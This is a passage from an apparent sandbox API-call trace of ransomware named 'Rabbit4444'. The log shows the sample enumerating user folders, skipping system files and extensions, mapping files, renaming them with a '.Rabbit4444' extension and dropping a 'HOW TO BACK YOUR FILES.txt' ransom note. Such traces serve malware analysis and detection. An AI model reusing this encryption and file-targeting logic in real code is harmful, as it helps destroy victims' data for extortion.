(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0071.026] CloseHandle (hObject=0x228) returned 1 [0071.027] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513") returned 142 [0071.027] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.027] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89e0c44, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdcb9ba8c, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xf3a8e52e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0071.027] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.027] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.027] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0071.027] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.027] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89e0c44, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdcb9ba8c, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xf3a8e52e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.027] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.027] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.027] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0071.027] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.027] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.027] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3a8e52e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3a8e52e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3a8e52e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0071.027] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.027] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0071.027] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdafe440a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xdafe440a, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xdb07ce8a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0xc92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504711307", cAlternateFileName="150471~1")) returned 1 [0071.027] lstrcmpiW (lpString1="1504711307", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.027] lstrcmpiW (lpString1="1504711307", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.027] lstrcmpiW (lpString1="1504711307", lpString2="Rabbit4444.exe") returned -1 [0071.027] lstrcmpiW (lpString1="1504711307", lpString2=".") returned 1 [0071.027] lstrcmpiW (lpString1="1504711307", lpString2="..") returned 1 [0071.027] lstrcmpiW (lpString1="1504711307", lpString2="windows") returned -1 [0071.027] lstrcmpiW (lpString1="1504711307", lpString2="bootmgr") returned -1 [0071.028] lstrcmpiW (lpString1="1504711307", lpString2="pagefile.sys") returned -1 [0071.028] lstrcmpiW (lpString1="1504711307", lpString2="boot") returned -1 [0071.028] lstrcmpiW (lpString1="1504711307", lpString2="ids.txt") returned -1 [0071.028] lstrcmpiW (lpString1="1504711307", lpString2="NTUSER.DAT") returned -1 [0071.028] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504711307" | out: lpString1="1504711307") returned="1504711307" [0071.028] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\1504711307", dwFileAttributes=0x0) returned 1 [0071.028] lstrlenW (lpString="1504711307") returned 10 [0071.028] lstrlenW (lpString="Rabbit4444") returned 10 [0071.028] lstrcmpiW (lpString1="1504711307", lpString2="Rabbit4444") returned -1 [0071.028] lstrlenW (lpString=".dll") returned 4 [0071.028] lstrcmpiW (lpString1="1307", lpString2=".dll") returned 1 [0071.028] lstrlenW (lpString=".lnk") returned 4 [0071.028] lstrcmpiW (lpString1="1307", lpString2=".lnk") returned 1 [0071.028] lstrlenW (lpString=".ini") returned 4 [0071.028] lstrcmpiW (lpString1="1307", lpString2=".ini") returned 1 [0071.028] lstrlenW (lpString=".sys") returned 4 [0071.028] lstrcmpiW (lpString1="1307", lpString2=".sys") returned 1 [0071.028] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\1504711307" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\214513\\1504711307"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.029] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.029] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16233940183) returned 1 [0071.029] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3218) returned 1 [0071.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0071.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0071.029] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa0, lpName=0x0) returned 0x27c [0071.030] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfa0) returned 0x70000 [0071.030] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110f00 [0071.031] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0071.031] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110f00 | out: hHeap=0xe0000) returned 1 [0071.031] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0071.031] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da70 [0071.031] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0071.031] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da70 | out: hHeap=0xe0000) returned 1 [0071.031] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0071.031] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16234173605) returned 1 [0071.031] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0071.031] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0071.031] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.031] CloseHandle (hObject=0x27c) returned 1 [0071.031] CloseHandle (hObject=0x260) returned 1 [0071.031] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\1504711307.Rabbit4444") returned 164 [0071.031] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\1504711307" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\214513\\1504711307"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\1504711307.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\214513\\1504711307.rabbit4444"), dwFlags=0x1) returned 1 [0071.032] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89e0c44, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc89e0c44, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9beea90d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0071.032] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.032] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0071.032] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.033] lstrlenW (lpString="eventbeacons.dat") returned 16 [0071.033] lstrlenW (lpString="Rabbit4444") returned 10 [0071.033] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.033] lstrlenW (lpString=".dll") returned 4 [0071.033] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.033] lstrlenW (lpString=".lnk") returned 4 [0071.033] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.033] lstrlenW (lpString=".ini") returned 4 [0071.033] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.033] lstrlenW (lpString=".sys") returned 4 [0071.033] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.033] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89e0c44, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdcb02fbe, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x9beea90d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0071.033] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.033] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0071.033] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.034] lstrlenW (lpString="imprbeacons.dat") returned 15 [0071.034] lstrlenW (lpString="Rabbit4444") returned 10 [0071.034] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.034] lstrlenW (lpString=".dll") returned 4 [0071.034] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.034] lstrlenW (lpString=".lnk") returned 4 [0071.034] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.034] lstrlenW (lpString=".ini") returned 4 [0071.034] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.034] lstrlenW (lpString=".sys") returned 4 [0071.034] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.035] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89e0c44, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdcb02fbe, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x9beea90d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0071.035] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0071.035] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0071.035] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\214513\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0071.035] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0071.035] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0071.036] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.036] CloseHandle (hObject=0x260) returned 1 [0071.036] CloseHandle (hObject=0x228) returned 1 [0071.036] GetCurrentThreadId () returned 0xd98 [0071.036] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0071.036] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509" [0071.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0071.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0071.036] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509" [0071.036] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\" [0071.036] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\.BFC0E91B00AE8A0620D3" [0071.036] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210509\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0071.040] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0071.042] FlushFileBuffers (hFile=0x228) returned 1 [0071.043] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0071.043] CloseHandle (hObject=0x228) returned 1 [0071.044] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509") returned 142 [0071.044] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.044] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a2d0a7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7d37eb5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf3ab476f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0071.044] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.044] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.044] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0071.044] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.045] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a2d0a7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe7d37eb5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf3ab476f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.045] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.045] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.045] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0071.045] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.045] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.045] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3ab476f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3ab476f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3ab476f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0071.045] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.045] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0071.045] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96b1660, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc96b1660, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc982edee, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0xd890, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504704835", cAlternateFileName="150470~1")) returned 1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2="Rabbit4444.exe") returned -1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2=".") returned 1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2="..") returned 1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2="windows") returned -1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2="bootmgr") returned -1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2="pagefile.sys") returned -1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2="boot") returned -1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2="ids.txt") returned -1 [0071.045] lstrcmpiW (lpString1="1504704835", lpString2="NTUSER.DAT") returned -1 [0071.045] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504704835" | out: lpString1="1504704835") returned="1504704835" [0071.045] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\1504704835", dwFileAttributes=0x0) returned 1 [0071.046] lstrlenW (lpString="1504704835") returned 10 [0071.046] lstrlenW (lpString="Rabbit4444") returned 10 [0071.046] lstrcmpiW (lpString1="1504704835", lpString2="Rabbit4444") returned -1 [0071.046] lstrlenW (lpString=".dll") returned 4 [0071.046] lstrcmpiW (lpString1="4835", lpString2=".dll") returned 1 [0071.046] lstrlenW (lpString=".lnk") returned 4 [0071.046] lstrcmpiW (lpString1="4835", lpString2=".lnk") returned 1 [0071.046] lstrlenW (lpString=".ini") returned 4 [0071.046] lstrcmpiW (lpString1="4835", lpString2=".ini") returned 1 [0071.046] lstrlenW (lpString=".sys") returned 4 [0071.046] lstrcmpiW (lpString1="4835", lpString2=".sys") returned 1 [0071.046] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\1504704835" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210509\\1504704835"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.047] QueryPerformanceFrequency (in: 